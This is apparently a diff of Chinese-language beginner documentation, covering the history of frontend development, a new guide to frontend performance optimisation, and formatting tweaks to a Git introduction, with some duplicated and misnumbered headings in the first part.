这就需要**响应式布局**:同一套 HTML/CSS,自动根据屏幕宽度变换布局。
这里用到了**媒体查询 (Media Query)**
它是 CSS 里的“条件判断”,比如“如果屏幕小于 640px,就用 1 列布局”。
<ResponsiveGridDemo />
**关键点**:响应式让网页“会变形”,不再只适配电脑。
---
## 3. 第三阶段:从操作 DOM 到数据驱动 (jQuery -> Vue/React)
网页开始像 App 一样复杂之后,最麻烦的事变成了:**同一份数据变化,要改很多地方**。
举个最常见的例子:购物车数量从 1 变成 2。
- 右上角小红点要变
- 购物车页面的数量要变
- 结算按钮的价格要变
下面这个可视化演示,专门用来解释:**什么是 jQuery(以及它为什么会累)**。
<JQueryVsStateDemo />
### 3.1 jQuery 的思路:我来“亲手改页面”
在 jQuery 时代(2005+),你通常会写很多“命令”去改页面:
“找到某个元素,把文字改掉;找到某个按钮,把它禁用……”
它的问题不是“写不出来”,而是:**只要漏改一个地方,页面就会出现前后不一致的 bug**。
页面越大,这种 bug 越多。
这里用到的新词(先解释清楚):
- **jQuery**:早期非常流行的 JavaScript 工具库,特点是“很方便地找元素、改元素”。
- **DOM**:浏览器里保存页面结构的一棵“树”(按钮、文字、图片都在这棵树上)。
- **ID**:HTML 元素的唯一名字(类似“身份证号”),方便你定位某一个元素。
- **div**:HTML 里最常用的“盒子”标签,用来做布局和容器。
### 3.2 Vue/React 的思路:我只改“数据”,页面自己变
后来大家意识到:与其到处改页面,不如只维护一份**状态 (State)**。
状态变了,页面自动刷新到正确的样子。
这就是“数据驱动 UI”的核心:
- **State(状态)**:页面的“数据”,比如购物车数量、登录状态、输入框内容。
- **数据驱动**:你只改 State,不直接改 DOM;框架负责把界面同步到正确状态。
- **Vue/React**:现代前端框架,主要解决“状态变化 -> 界面自动更新”。
### 3.3 什么是“命令式”和“声明式”?
### 1.1 什么是"命令式"
这就好比你要画一幅画:
* **命令式**:你告诉画家“拿起笔,蘸红颜料,在坐标(10,10)画一个圈”。
* **声明式**:你直接给画家一张照片,“给我画成这样”。
### 1.2 交互演示:命令式 vs 声明式
- **命令式**:你告诉画家“拿起笔,蘸红颜料,在坐标(10,10)画一个圈”。
- **声明式**:你直接给画家一张照片,“给我画成这样”。
### 3.4 交互演示:两种写法的区别
下方的演示展示了两种思维的巨大差异。
* **左边 (jQuery)**:你需要手动关注每一步 DOM 操作。忘了更新 DOM?界面就不对了。
* **右边 (Vue)**:你只管修改数据 `count`,界面自动变
- **左边 (jQuery)**:你需要手动关注每一步 DOM 操作。忘了更新 DOM?界面就不对了
- **右边 (Vue)**:你只管修改数据 `count`,界面自动变。
<ImperativeVsDeclarativeDemo />
**关键点**现代框架(Vue/React)的核心价值,就是把我们从繁琐的 DOM 操作中解放出来,专注于**数据(State)**
**关键点**从 jQuery 到 Vue/React,变化的核心不是“语法”,而是**思维方式**:从“我去改页面”变成“我只改数据”
### 3.5 Vue 和 React 怎么选?先把差异理解清楚
很多初学者会纠结:“我到底学 Vue 还是 React?”
先别急着站队。你先把它们的“共同点”和“差异点”理解清楚,就不会被带节奏了。
**共同点(它们都在解决同一件事)**
- 都是为了解决:页面复杂时,如何可靠地管理状态、更新界面
- 都强调:组件化(把页面拆成积木)
**差异点(你会在写代码时真实感受到)**
- **写 UI 的方式**Vue 常用 TemplateReact 常用 JSX
- **状态变化时怎么更新**:Vue 更偏“依赖追踪”;React 更偏“重新渲染组件函数”
这里的几个新词(像课件一样解释清楚):
- **Template**Vue 常见写法,用类似 HTML 的语法来写界面。
- **JSX**React 常见写法,用“像写 JS 一样”的方式写界面结构。
- **Hook**React 的一套函数式能力(比如 `useState`),用来保存状态、处理副作用。
- **SFC**Single File ComponentVue 常见的单文件组件(一个 `.vue` 文件里写模板/逻辑/样式)。
<VueReactComparisonDemo />
**关键点**:别死记名词。你只要记住一句话:它们都能做同样的产品,只是“写法和心智模型”不一样。
---
## 2. 工业化革命:组件化 (Component)
## 4. 第四阶段:组件化(像搭积木一样写页面)
解决了"怎么更新页面"的问题,接下来要解决"怎么组织代码"的问题
以前写网页,是一个大的 HTML 文件,混杂着几千行 JS 代码。改一个按钮可能弄坏整个页面
解决了怎么更新页面的问题,接下来是“怎么组织代码
以前一个页面可能是一个大的 HTML 文件,改一个按钮可能牵连全局
### 4.1 “积木”是什么?
### 2.1 乐高积木思维
现代前端把页面拆成了**组件**。
一个按钮、一个导航栏、一个商品卡片,都是独立的积木。
### 2.2 组件复用
### 4.2 为什么组件复用
定义好一个"商品卡片"组件后,你可以由它生成 100 个实例。每个实例都有自己独立的状态(比如点赞状态),互不干扰。
<ComponentReusabilityDemo />
**思考**上面的演示中,点击生成的每一个 "Counter" 或 "Card",它们的数据是独立的吗?
是的。这就是组件化的魔力:**封装**与**复用**。
**新名词解释**
- **组件 (Component)**:页面里的“积木块”,可以单独复用。
- **封装**:组件内部的状态不影响别人。
- **复用**:同一个组件可以用很多次。
**关键点**:组件化让页面像搭积木一样搭出来。
---
## 3. 总结
## 5. 第五阶段:页面切换体验(MPA vs SPA)
用户不再想要“每点一次就刷新整页”的体验。
于是出现了**单页应用 (SPA)**:整个网站只加载一次,之后只是切换内容。
与之对应的是**多页应用 (MPA)**:每点一次都会重新加载整个页面。
这里的一个新词:**路由 (Routing)**。
简单理解:就是“从 A 页面切到 B 页面”的规则和过程。
再补两个新词(非常重要):
- **前端路由**:页面切换主要由浏览器里的 JavaScript 控制(常见于 SPA)。
- **后端路由**:页面切换主要由服务器决定“返回哪个页面”(常见于 MPA)。
<RoutingModeDemo />
### 5.1 MPA 是什么?(多页应用)
MPA 的直觉很像“翻书”:
- 点“商品页” -> 浏览器向服务器要一个新的页面(新的 HTML)
- 旧页面被替换掉 -> 原来的输入、滚动位置、临时数据往往会消失
**优点(为什么很多网站仍在用)**
- 结构简单:服务器负责“出页面”,浏览器负责“展示”
- SEO 友好:搜索引擎更容易直接看到页面内容
- 首屏容易快:因为服务器直接给了 HTML
**缺点**
- 体验偏“跳”:整页刷新会白一下、加载一下
- 复杂交互会变难:页面之间共享状态不方便
### 5.2 SPA 是什么?(单页应用)
SPA 更像“同一本书里换章节”:
- 第一次打开:加载一个“外壳页面”(HTML + CSS + JS
- 之后切换页面:通常只换内容区域,整页不刷新
**优点**
- 体验丝滑:页面切换快
- 状态好管理:同一个页面里,数据更容易共享(登录态、购物车等)
**缺点(也要知道)**
- 首次加载可能更慢:需要先下载一堆 JS
- SEO 要额外处理:通常需要 SSR/SSG 方案配合(后面第 7 阶段会讲)
### 5.3 交互演示:状态会不会丢?
下面这个小实验更直观:输入一段文字,然后切换页面再回来,看看有没有被清空。
<SpaStatePreservationDemo />
**关键点**:从“整页刷新”到“局部更新”,带来的不仅是速度,更是“状态能不能保留”的体验差异。
---
## 6. 第六阶段:工程化(打包、依赖、规范)
前端项目越来越大,不能再靠手动引入脚本文件。
于是有了**打包工具**(Webpack/Vite):把多个文件和依赖打成一个或多个“优化后的包”。
**依赖**就是你用到的第三方库,比如图表库、编辑器。
<BundlerSizeDemo />
这里的几个新词:
- **工程化**:用工具和规范把项目“像工程一样”管理(目录结构、构建、发布、代码规范等)。
- **Bundle(包)**:打包后的产物文件。
- **Tree Shaking**:把“没用到的代码”从包里摇掉,体积更小。
**关键点**:工程化让多人协作的大项目变得可控。
---
## 7. 第七阶段:渲染方式(CSR / SSR / SSG
为了更快的首屏、更好的搜索排名,渲染方式也在进化。
- **CSR**:客户端渲染。浏览器拿到 JS 之后再画页面。
- **SSR**:服务端渲染。服务器先把 HTML 画好再发给浏览器。
- **SSG**:静态生成。提前把页面生成好,像静态文件一样直接发。
这里的几个新词:
- **首屏**:用户打开网站时,最先看到的那一屏内容。
- **SEO**Search Engine Optimization,搜索引擎优化。让页面更容易被搜索到。
- **TTFB**Time To First Byte,浏览器收到“第一口数据”的时间(越小越快)。
- **TTI**Time To Interactive,页面变得“可以点、可以用”的时间。
<RenderingStrategyDemo />
**关键点**:不同渲染策略适配不同业务场景。
---
## 8. 小结与学习建议
前端技术的进化,本质上是在解决两个问题:
1. **效率**:从 手动操作 DOM -> 数据驱动 (MVVM)。
2. **规模**:从 巨型面条代码 -> 组件化架构。
现在的你,正站在巨人的肩膀上,使用着最先进的生产力工具
1. **效率**:从 手动操作 DOM -> 数据驱动 (MVVM)
2. **规模**:从 巨型面条代码 -> 组件化 + 工程化。
**MVVM 是什么?**
简单理解:**Model(数据)变了,View(界面)自动变**。
现在你可以把前端理解成三件事:
1. **写页面**HTML + CSS(结构与样式)
2. **让页面动起来**JavaScript(交互与状态)
3. **把复杂项目做好**:组件化 + 工程化(协作与质量)
如果你刚开始学,建议按这个顺序:
- 先把 HTML/CSS 写熟(布局、响应式)
- 再学 JavaScript 的基础(变量、函数、事件)
- 最后上手一个框架(Vue/React),理解“状态驱动 UI”
docs/zh-cn/appendix/frontend-performance.md
+835
View File
@@ -0,0 +1,835 @@
# 前端性能优化:从加载到渲染 (Interactive Guide to Frontend Performance)
> 💡 **学习指南**:本章节通过交互式演示和实战案例,帮你建立前端性能优化的完整知识体系。性能优化不是玄学,而是一套可测量、可优化的工程方法论。
## 0. 引言:为什么性能很重要?
**性能就是用户体验。**
一个页面加载多慢,用户就会流失?研究数据表明:
- **3 秒法则**:页面加载超过 3 秒,53% 的用户会离开
- **0.1 秒延迟**:亚马逊发现页面延迟 0.1 秒,销售额下降 1%
- **移动端更敏感**:移动用户对性能的容忍度更低
性能优化不只是"让页面变快",而是:
- **提升转化率**:更快的加载 = 更多的订单/注册
- **改善 SEO**:搜索引擎优先索引加载快的页面
- **降低成本**:优化的资源 = 更少的带宽和服务器成本
### 0.1 核心性能指标 (Core Web Vitals)
Google 定义了三个核心性能指标,所有网页都应该达标:
<PerformanceMetricsDemo />
**关键点**:性能优化要关注真实用户感受到的体验,而不只是技术指标。
### 0.2 性能预算 (Performance Budget)
**性能预算**是为项目设定的性能限制,比如:
- JavaScript 文件不超过 200KB
- 首屏加载时间不超过 2 秒
- 总资源大小不超过 1MB
**为什么需要预算?**
- 防止项目膨胀:随着功能增加,性能很容易恶化
- 团队协作规范:新功能上线前必须通过性能检查
- 持续优化动力:每次迭代都有改进目标
---
## 1. 性能分析工具
在优化之前,先学会**测量**。只有找到瓶颈,才能精准优化。
### 1.1 Chrome DevTools
浏览器自带的开发者工具,功能强大:
**Performance 面板**
- 录制页面运行过程
- 查看 FPS(帧率)、CPU 使用率
- 分析 JavaScript 执行时间
- 找出长任务(Long Tasks,超过 50ms 的 JS 任务)
**Lighthouse 面板**
- 一键生成性能报告
- 包含性能、可访问性、最佳实践、SEO 等评分
- 给出具体优化建议
**Network 面板**
- 查看所有资源加载时间
- 分析瀑布图(Waterfall
- 找出加载慢的资源
### 1.2 WebPageTest
在线性能测试工具([webpagetest.org](https://webpagetest.org)):
- 多地点测试(全球各地)
- 真实浏览器测试(Chrome、Firefox、Safari
- 丰富的测试报告和视频
- 可以模拟不同网速(3G、4G
### 1.3 PageSpeed Insights
Google 官方工具([pagespeed.web.dev](https://pagespeed.web.dev)):
- 基于 Core Web Vitals 评分
- 区分移动端和桌面端
- 提供字段数据(真实用户数据)和实验室数据
**关键点**:用数据驱动优化,而不是凭感觉。
---
## 2. 加载优化 (Loading Optimization)
加载优化是性能优化的第一步:让资源更快地到达浏览器。
### 2.1 资源压缩
**文本压缩**:使用 Gzip 或 Brotli 压缩 HTML、CSS、JavaScript
```
未压缩: 500 KB
Gzip: 150 KB (压缩率 70%)
Brotli: 120 KB (压缩率 76%)
```
**开启方法**Nginx 配置):
```nginx
gzip on;
gzip_types text/css application/javascript;
gzip_min_length 1000;
# Brotli 需要额外模块
brotli on;
brotli_types text/plain text/css application/javascript;
```
**图片压缩**:使用工具(如 ImageOptim、TinyPNG)压缩图片
<LazyLoadingDemo />
### 2.2 代码分割 (Code Splitting)
**问题**:传统打包方式把所有代码打包成一个文件,首屏要下载大量无用代码
**解决方案**:按路由或功能分割代码,用户只下载当前页面需要的代码
**示例**Vite + Vue Router):
```javascript
// 懒加载路由组件
const Home = () => import('./views/Home.vue')
const About = () => import('./views/About.vue')
const routes = [
{ path: '/', component: Home },
{ path: '/about', component: About }
]
```
**效果**
- 首页只加载 100KB(而不是 500KB
- 用户访问 /about 时才加载额外代码
- 整体首屏时间减少 60%
### 2.3 Tree Shaking
**Tree Shaking**:移除未使用的代码
**示例**
```javascript
// 整个 lodash 库:70 KB
import _ from 'lodash'
// 只用某个函数:2 KB
import debounce from 'lodash/debounce'
```
**Tree Shaking 原理**
- ES Module 的 `import/export` 是静态结构
- 打包工具(Webpack、Vite)可以分析哪些代码被使用
- 未使用的代码在打包时被删除
### 2.4 预加载 (Preloading)
**预加载关键资源**:告诉浏览器提前加载重要资源
```html
<!-- 预加载关键 CSS -->
<link rel="preload" href="critical.css" as="style">
<!-- 预加载字体 -->
<link rel="preload" href="font.woff2" as="font" crossorigin>
<!-- DNS 预解析 -->
<link rel="dns-prefetch" href="https://api.example.com">
<!-- 预连接 -->
<link rel="preconnect" href="https://cdn.example.com">
```
**优先级**
- `preload`:立即下载(但可能抢占关键资源)
- `prefetch`:空闲时下载(适合下一页资源)
- `preconnect`:提前建立 TCP 连接
### 2.5 CDN 加速
**CDNContent Delivery Network**:内容分发网络
**工作原理**
- 把静态资源部署到全球各地的服务器
- 用户从最近的服务器下载资源
- 减少网络传输延迟
**使用建议**
- 图片、字体、CSS、JS 等静态资源放 CDN
- 使用公共 CDN(如 unpkg、jsDelivr)加载第三方库
- 大型网站使用自建 CDN 或商业 CDN(如 Cloudflare
**效果**
- 国内用户加载速度提升 50%-80%
- 海外用户体验显著改善
---
## 3. 渲染优化 (Rendering Optimization)
资源加载完成后,浏览器要"画"出页面。渲染优化让这个过程更快。
### 3.1 关键渲染路径 (Critical Rendering Path)
**浏览器渲染流程**
1. **解析 HTML** → 构建 DOM 树
2. **解析 CSS** → 构建 CSSOM 树
3. **合并 DOM + CSSOM** → 构建渲染树
4. **布局(Layout**:计算元素位置和大小
5. **绘制(Paint**:绘制像素
6. **合成(Composite**:合成图层
**关键点**:每一步都可能成为性能瓶颈。
### 3.2 DOM 优化
**减少 DOM 操作**DOM 操作很慢,批量处理
**示例**(低效):
```javascript
// 每次循环都触发重排
for (let i = 0; i < 1000; i++) {
document.body.innerHTML += `<div>${i}</div>`
}
```
**优化**
```javascript
// 使用文档片段,只触发一次重排
const fragment = document.createDocumentFragment()
for (let i = 0; i < 1000; i++) {
const div = document.createElement('div')
div.textContent = i
fragment.appendChild(div)
}
document.body.appendChild(fragment)
```
**使用虚拟 DOM**
- Vue、React 使用虚拟 DOM 减少真实 DOM 操作
- 批量更新,减少重排次数
### 3.3 CSS 优化
**减少 CSS 大小**
- 移除未使用的 CSS(使用 PurgeCSS
- 压缩 CSS(移除空格、注释)
**优化 CSS 选择器**
```css
/* 慢:从右向左匹配 */
.container div ul li a { }
/* 快:使用类选择器 */
.link { }
```
**关键 CSS 内联**
- 把首屏需要的 CSS 内联到 HTML
- 减少渲染阻塞
```html
<style>
/* 首屏关键 CSS */
.header { }
.hero { }
</style>
```
### 3.4 重排与重绘
<ReflowRepaintDemo />
**触发重排的操作**
- 改变元素大小、位置
- 添加/删除 DOM 元素
- 改变字体大小
- 改变窗口大小
**触发重绘的操作**
- 改变颜色
- 改变背景
- 改变边框样式
**优化建议**
- 批量修改样式(使用 class
- 使用 `transform``opacity`(触发合成)
- 避免逐帧修改样式(使用 requestAnimationFrame
### 3.5 合成层 (Compositing)
**使用 `will-change` 提示浏览器**
```css
.animated-element {
will-change: transform, opacity;
}
```
**使用 GPU 加速**
```css
.gpu-accelerated {
transform: translateZ(0);
/* 或 */
transform: translate3d(0, 0, 0);
}
```
**注意**:不要滥用合成层,过多会消耗内存。
---
## 4. JavaScript 优化
JavaScript 是页面的"肌肉",优化它让页面更流畅。
### 4.1 代码压缩 (Minification)
**移除不必要的字符**
- 空格、换行、注释
- 缩短变量名
- 移除无用代码
**工具**
- **Terser**JavaScript 压缩工具
- **ESBuild**:极快的打包工具
- **Vite**:开发环境使用 ESBuild,生产环境使用 Rollup
**示例**
```javascript
// 原始代码
function calculateTotal(price, quantity) {
return price * quantity
}
// 压缩后
function calculateTotal(a,b){return a*b}
```
### 4.2 防抖与节流
**防抖 (Debounce)**:事件触发后,等待一段时间再执行
```javascript
// 搜索框输入:停止输入 300ms 后才搜索
const debouncedSearch = debounce((keyword) => {
searchAPI(keyword)
}, 300)
input.addEventListener('input', (e) => {
debouncedSearch(e.target.value)
})
```
**节流 (Throttle)**:限制函数执行频率
```javascript
// 滚动事件:最多每 100ms 执行一次
const throttledScroll = throttle(() => {
updatePosition()
}, 100)
window.addEventListener('scroll', throttledScroll)
```
### 4.3 Web Workers
**Web Workers**:在后台线程运行 JavaScript,不阻塞主线程
**使用场景**
- 大数据计算
- 图片/视频处理
- 复杂算法
**示例**
```javascript
// 主线程
const worker = new Worker('calculator.js')
worker.postMessage({ data: largeData })
worker.onmessage = (e) => {
console.log('计算结果:', e.data.result)
}
// calculator.js (Worker 线程)
self.onmessage = (e) => {
const result = heavyCalculation(e.data.data)
self.postMessage({ result })
}
```
### 4.4 避免长任务
**长任务(Long Task**:执行时间超过 50ms 的任务
**问题**:长任务会阻塞主线程,导致页面卡顿
**解决方案**
- **时间切片**:把大任务拆成小任务
- **使用 requestIdleCallback**:在浏览器空闲时执行
- **Web Workers**:移到后台线程
**示例**(时间切片):
```javascript
async function processLargeArray(items) {
for (let i = 0; i < items.length; i++) {
processItem(items[i])
// 每 100 个项目暂停一次,让浏览器处理其他任务
if (i % 100 === 0) {
await new Promise(resolve => setTimeout(resolve, 0))
}
}
}
```
---
## 5. 图片优化
图片通常是网页最大的资源,优化图片能显著提升性能。
### 5.1 格式选择
<ImageOptimizationDemo />
**格式对比**
| 格式 | 大小 | 质量 | 浏览器支持 | 适用场景 |
|------|------|------|-----------|----------|
| JPEG | 小 | 好 | 所有 | 照片 |
| PNG | 大 | 最好 | 所有 | 透明图片、图标 |
| WebP | 很小 | 好 | 现代浏览器 | 大部分场景 |
| AVIF | 最小 | 很好 | 最新浏览器 | 追求极致性能 |
**建议**
- 优先使用 WebP
- 提供降级方案(JPEG/PNG
```html
<picture>
<source srcset="image.webp" type="image/webp">
<img src="image.jpg" alt="描述">
</picture>
```
### 5.2 响应式图片
**根据屏幕尺寸加载不同尺寸的图片**
```html
<img
src="image-800.jpg"
srcset="
image-400.jpg 400w,
image-800.jpg 800w,
image-1200.jpg 1200w
"
sizes="(max-width: 600px) 400px, 800px"
alt="响应式图片"
>
```
**解释**
- `srcset`:定义不同尺寸的图片
- `sizes`:告诉浏览器图片在不同屏幕上的显示尺寸
- 浏览器自动选择最合适的图片
### 5.3 懒加载
<LazyLoadingDemo />
**图片懒加载**:只有当图片进入视口时才加载
**方法 1:使用 `loading` 属性**
```html
<img src="image.jpg" loading="lazy" alt="懒加载图片">
```
**方法 2:使用 Intersection Observer**
```javascript
const observer = new IntersectionObserver((entries) => {
entries.forEach(entry => {
if (entry.isIntersecting) {
const img = entry.target
img.src = img.dataset.src
observer.unobserve(img)
}
})
})
document.querySelectorAll('img[data-src]').forEach(img => {
observer.observe(img)
})
```
### 5.4 压缩与裁剪
**使用工具压缩图片**
- **ImageOptim**Mac
- **TinyPNG**(在线)
- **Squoosh**Google 开源)
**使用 CDN 实时裁剪**
```html
<!-- 使用 CDN 裁剪为 800x600 -->
<img src="https://cdn.example.com/image.jpg?w=800&h=600&q=80">
```
---
## 6. 字体优化
字体也会影响性能,不当的字体加载会导致 FOUT/FOIT。
### 6.1 Web Font 优化
**问题**:使用 Web Font 时,浏览器可能:
- **FOUT**Flash of Unstyled Text):先显示系统字体,然后切换到 Web Font
- **FOIT**Flash of Invisible Text):文字隐藏,等 Web Font 加载完才显示
### 6.2 Font Display 策略
```css
@font-face {
font-family: 'MyFont';
src: url('myfont.woff2') format('woff2');
font-display: swap; /* 立即显示系统字体,Web Font 加载完再切换 */
}
```
**`font-display` 值**
- `auto`:浏览器默认
- `swap`:立即显示文本,Web Font 加载后替换(推荐)
- `fallback`:短时间隐藏,超时后显示系统字体
- `optional`:如果 Web Font 加载慢,就不使用它
### 6.3 字体子集化
**只包含用到的字符**
- 中文字体很大(几 MB),但通常只用几百个字
- 使用工具提取子集
**工具**
- **Fontmin**(中文字体子集化)
- **glyphhanger**(提取页面实际使用的字符)
**示例**
```bash
# 只提取常用的 500 个汉字
fontmin input.ttf output/ --text='常用的五百个汉字...'
```
**结果**
- 原始字体:5 MB
- 子集化后:200 KB
- 减少 96%
---
## 7. 缓存策略
缓存是性能优化的"银弹",用好了能极大提升性能。
### 7.1 HTTP 缓存
**强缓存(Strong Cache**
```nginx
# 静态资源缓存 1 年
location ~* \.(jpg|png|css|js)$ {
expires: 1y;
add_header Cache-Control: public, immutable;
}
```
**协商缓存(Conditional Cache**
```nginx
# 使用 ETag
location / {
etag on;
}
```
**最佳实践**
- 带哈希的文件名(如 `app.abc123.js`):永久缓存
- 不带哈希的文件:协商缓存
### 7.2 Service Worker
**Service Worker**:在浏览器后台运行的脚本,可以拦截网络请求
**核心能力**
- 离线访问
- 资源缓存
- 后台同步
**示例**(使用 Workbox):
```javascript
// 注册 Service Worker
if ('serviceWorker' in navigator) {
navigator.serviceWorker.register('/sw.js')
}
// sw.js (Service Worker 脚本)
workbox.routing.registerRoute(
/\.(?:png|jpg|jpeg|svg|gif)$/,
new workbox.strategies.CacheFirst({
cacheName: 'images',
plugins: [
new workbox.expiration.ExpirationPlugin({
maxEntries: 60,
maxAgeSeconds: 30 * 24 * 60 * 60, // 30 天
}),
],
})
)
```
### 7.3 LocalStorage / IndexedDB
**LocalStorage**:存储简单数据(5-10 MB
```javascript
// 缓存 API 数据
localStorage.setItem('cache_key', JSON.stringify(data))
const cached = JSON.parse(localStorage.getItem('cache_key'))
```
**IndexedDB**:存储大量结构化数据
```javascript
// 存储离线数据
const db = await openDB('mydb', 1, {
upgrade(db) {
db.createObjectStore('posts')
}
})
await db.put('posts', postData, 'post-1')
```
---
## 8. 监控与持续优化
性能优化不是一次性的工作,需要持续监控和改进。
### 8.1 Real User Monitoring (RUM)
**RUM**:收集真实用户的性能数据
**工具**
- **Google Analytics**:免费,基础数据
- **Cloudflare Web Analytics**:免费,注重隐私
- **SpeedCurve**:付费,专业级
**关键指标**
- 首屏时间(FCP、LCP
- 交互时间(TTI
- 转化率与性能的关系
### 8.2 Synthetic Monitoring
**合成监控**:用模拟用户定期测试
**工具**
- **Lighthouse CI**:每次提交代码自动测试
- **WebPageTest**:定期测试关键页面
- **Pingdom**:简单易用的监控服务
### 8.3 性能预算
**设置预算并强制执行**
```javascript
// vite.config.js
import { defineConfig } from 'vite'
export default defineConfig({
build: {
rollupOptions: {
output: {
manualChunks: {
'vendor': ['vue', 'vue-router'],
'ui': ['element-plus']
}
}
}
}
})
```
**使用 Lighthouse CI 检查预算**
```json
// lighthouserc.json
{
"ci": {
"assert": {
"preset": "desktop",
"assertions": {
"first-contentful-paint": ["warn", { "maxNumericValue": 2000 }],
"interactive": ["error", { "maxNumericValue": 5000 }]
}
}
}
}
```
---
## 9. 实战案例
### 9.1 案例 1:优化一个慢页面
**问题**:一个电商商品页加载需要 8 秒
**诊断**
- 图片总和:3 MB
- JavaScript1.2 MB
- CSS400 KB
- 45 个资源请求
**优化措施**
1. 压缩图片 → 减少 60%(1.2 MB)
2. 使用 WebP → 再减少 30%800 KB
3. 图片懒加载 → 首屏只加载 3 张图
4. 代码分割 → 首屏 JS 减少到 300 KB
5. 启用 Gzip → CSS 减少到 150 KB
**结果**
- 首屏时间:8 秒 → 1.8 秒(减少 77%)
- Lighthouse 性能评分:35 → 92
### 9.2 案例 2:大型应用的性能优化
**问题**:单页应用(SPA)首次加载慢
**优化策略**
1. **路由懒加载**:每个路由单独打包
2. **组件懒加载**:非首屏组件延迟加载
3. **虚拟列表**:长列表只渲染可见部分
4. **预加载下一页**:用户可能访问的页面预加载
5. **SSR(服务端渲染)**:首屏由服务器渲染
**技术选型**
- 使用 **Vite**(快速构建)
- 使用 **Vue 3**(更好的性能)
- 使用 **Pinia**(轻量状态管理)
- 使用 **Vant**(按需引入的 UI 组件库)
**结果**
- 首屏加载时间:4.5 秒 → 1.2 秒
- Time to Interactive6 秒 → 1.8 秒
### 9.3 案例 3:移动端性能优化
**移动端特殊挑战**
- CPU 性能弱
- 网络慢
- 内存有限
**优化措施**
1. **减少动画**:使用 CSS 动画代替 JS 动画
2. **触摸优化**:避免 `click` 延迟,使用 `touchstart`
3. **减少重排**:使用 `transform` 代替 `top/left`
4. **减少资源**:移动端加载更小的图片
5. **PWA**:支持离线访问,提供类原生体验
**结果**
- 移动端评分:45 → 95
- 用户留存率提升:+30%
---
## 10. 总结与最佳实践
### 10.1 性能优化清单
**加载优化**
- ✅ 启用 Gzip/Brotli 压缩
- ✅ 使用 CDN 加速静态资源
- ✅ 实施代码分割和懒加载
- ✅ 压缩和优化图片
- ✅ 使用 WebP/AVIF 格式
**渲染优化**
- ✅ 减少重排和重绘
- ✅ 使用 CSS 动画(transform、opacity
- ✅ 优化关键渲染路径
- ✅ 内联关键 CSS
**JavaScript 优化**
- ✅ 压缩和 Tree Shaking
- ✅ 避免长任务(时间切片)
- ✅ 使用 Web Workers
- ✅ 防抖和节流
**缓存优化**
- ✅ 配置 HTTP 缓存
- ✅ 使用 Service Worker
- ✅ 合理使用 LocalStorage
**监控优化**
- ✅ 设置性能预算
- ✅ 使用 RUM 和合成监控
- ✅ 定期审计性能
### 10.2 性能优化原则
1. **测量优先**:先测量,再优化
2. **抓大放小**:先优化最大的瓶颈
3. **用户体验第一**:关注真实用户感受
4. **持续改进**:性能优化是持续的过程
5. **团队协作**:让整个团队都关注性能
### 10.3 常见陷阱
- ❌ 过早优化:没有测量就开始优化
- ❌ 过度优化:为了优化而优化,得不偿失
- ❌ 只关注分数:Lighthouse 分数高不代表用户体验好
- ❌ 忽视移动端:移动端性能更重要
- ❌ 一次性优化:性能需要持续监控和改进
### 10.4 学习资源
**工具**
- [Lighthouse](https://developers.google.com/web/tools/lighthouse)
- [WebPageTest](https://www.webpagetest.org)
- [PageSpeed Insights](https://pagespeed.web.dev)
**文档**
- [Web.dev Performance](https://web.dev/performance/)
- [MDN Performance](https://developer.mozilla.org/en-US/docs/Web/Performance)
**书籍**
- 《高性能网站建设指南》
- 《高性能网站建设进阶指南》
- 《Web 性能权威指南》
---
**记住**:性能优化不是炫技,而是为用户创造价值。快的体验就是好的体验。
docs/zh-cn/appendix/git-intro.md
+20 -18
View File
@@ -15,6 +15,7 @@
```
**Git 完美解决了三个问题**
1. **版本混乱**:不需要复制副本,一个文件夹搞定所有历史版本。
2. **无法后悔**:删错了代码?一秒钟找回三天前的状态。
3. **协作冲突**:你改了 A 文件,我改了 B 文件,Git 帮我们自动合并。
@@ -27,9 +28,9 @@ Git 的设计哲学其实很像**寄快递**。
<GitThreeAreasDemo />
* **工作区 (Working Dir)**:你的**书桌**。你正在这里写代码,想怎么乱改都行。
* **暂存区 (Staging Area)**:**快递盒**。你把写好的文件放进去(`git add`),准备打包。
* **仓库 (Repository)****快递柜**。一旦你封箱寄出(`git commit`),这个版本就被永久记录下来了。
- **工作区 (Working Dir)**:你的**书桌**。你正在这里写代码,想怎么乱改都行。
- **暂存区 (Staging Area)**:**快递盒**。你把写好的文件放进去(`git add`),准备打包。
- **仓库 (Repository)****快递柜**。一旦你封箱寄出(`git commit`),这个版本就被永久记录下来了。
> 🔑 **关键点**:只有提交(Commit)到仓库的内容,才是安全的。工作区里没提交的内容,丢了就真丢了。
@@ -55,24 +56,24 @@ Git 的设计哲学其实很像**寄快递**。
<GitBranchMergeDemo />
* **主分支 (Main/Master)**:稳定的线上版本,只有测试通过的代码才能进来。
* **开发分支 (Feature)**:你的试验田。你在这里炸了地球也没关系,不会影响主分支。
* **合并 (Merge)**:你在试验田里测试成功了,就把改动“合并”回主分支。
- **主分支 (Main/Master)**:稳定的线上版本,只有测试通过的代码才能进来。
- **开发分支 (Feature)**:你的试验田。你在这里炸了地球也没关系,不会影响主分支。
- **合并 (Merge)**:你在试验田里测试成功了,就把改动“合并”回主分支。
---
## 5. 常用命令速查
| 命令 | 作用 | 人话解释 |
| :--- | :--- | :--- |
| `git init` | 初始化 | "我要在这里建个新仓库" |
| `git status` | 查看状态 | "现在书桌上乱不乱?有没有东西没装箱?" |
| `git add .` | 添加所有 | "把桌上所有文件都扔进快递盒" |
| `git commit -m "..."` | 提交 | "封箱!贴上标签,写上这次改了啥" |
| `git log` | 查看历史 | "翻翻以前的日记" |
| `git checkout -b dev` |以此创建新分支 | "我要去平行宇宙 dev 探险了" |
| `git checkout main` | 切换分支 | "回地球(主分支)看看" |
| `git merge dev` | 合并分支 | "把平行宇宙的成果带回地球" |
| 命令 | 作用 | 人话解释 |
| :-------------------- | :------------- | :------------------------------------- |
| `git init` | 初始化 | "我要在这里建个新仓库" |
| `git status` | 查看状态 | "现在书桌上乱不乱?有没有东西没装箱?" |
| `git add .` | 添加所有 | "把桌上所有文件都扔进快递盒" |
| `git commit -m "..."` | 提交 | "封箱!贴上标签,写上这次改了啥" |
| `git log` | 查看历史 | "翻翻以前的日记" |
| `git checkout -b dev` | 以此创建新分支 | "我要去平行宇宙 dev 探险了" |
| `git checkout main` | 切换分支 | "回地球(主分支)看看" |
| `git merge dev` | 合并分支 | "把平行宇宙的成果带回地球" |
---
@@ -85,7 +86,8 @@ Git 的设计哲学其实很像**寄快递**。
此时你需要手动打开文件,保留需要的代码,删除 Git 自动生成的 `<<<<<<<` 标记,然后重新提交。
至于**远程仓库 (Remote)**(比如 GitHub/GitLab),它就是云端的备份中心。
* `git push`:把本地存档上传到云端。
